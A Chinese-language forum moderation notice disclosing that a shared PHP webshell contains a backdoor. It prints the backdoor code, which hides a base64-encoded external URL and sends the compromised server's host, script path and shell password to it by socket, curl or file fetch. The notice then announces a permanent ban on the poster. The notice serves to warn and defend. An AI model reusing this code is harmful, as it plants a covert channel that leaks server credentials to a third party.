在其发布的”分享一个完美支持php7的大马 “主题中,经确认其分享的webshell存在后门:
if(isset($_GET['login'])=='geturl'){
@set_time_limit(10);
$serveru = $_SERVER ['HTTP_HOST'].$_SERVER['PHP_SELF'];
$serverp = postpass;
$copyurl = base64_decode('aHR0cDovL3d3dy53b3JkcHJlc3MtanMuY29tL1VzZXItQWdlbnQucGhwP25hbWU9');
//http://www.wordpress-js.com/User-Agent.php?name=
$url=$copyurl.$serveru.'&pass='.$serverp;
$url=urldecode($url);
GetHtml($url);
}
function GetHtml($url)
{
$c = '';
$useragent = 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2)';
if(function_exists('fsockopen')){
$link = parse_url($url);
$query=$link['path'].'?'.$link['query'];
$host=strtolower($link['host']);
$port=$link['port'];
if($port==""){$port=80;}
$fp = fsockopen ($host,$port, $errno, $errstr, 10);
if ($fp)
{
$out = "GET /{$query} HTTP/1.0\r\n";
$out .= "Host: {$host}\r\n";
$out .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2)\r\n";
$out .= "Connection: Close\r\n\r\n";
fwrite($fp, $out);
$inheader=1;
while(!feof($fp))
{$line=fgets($fp,4096);
if($inheader==0){$contents.=$line;}
if ($inheader &&($line=="\n"||$line=="\r\n")){$inheader = 0;}
}
fclose ($fp);
$c= $contents;
}
}
if(empty($c) && function_exists('curl_init') && function_exists('curl_exec')){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_TIMEOUT, 15);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
$c = curl_exec($ch);
curl_close($ch);
}
if(empty($c) && ini_get('allow_url_fopen')){
$c = file_get_contents($url);
}
if(empty($c)){
echo "document.write('<DIV style=\'CURSOR:url(\"$url\")\'>');";
}
if(!empty($c))
{
return $c;
}
}
根据论坛规则:
给予永久封禁ID处理
希望大家共同营造一个好的环境,谢谢各位及时发现的成员。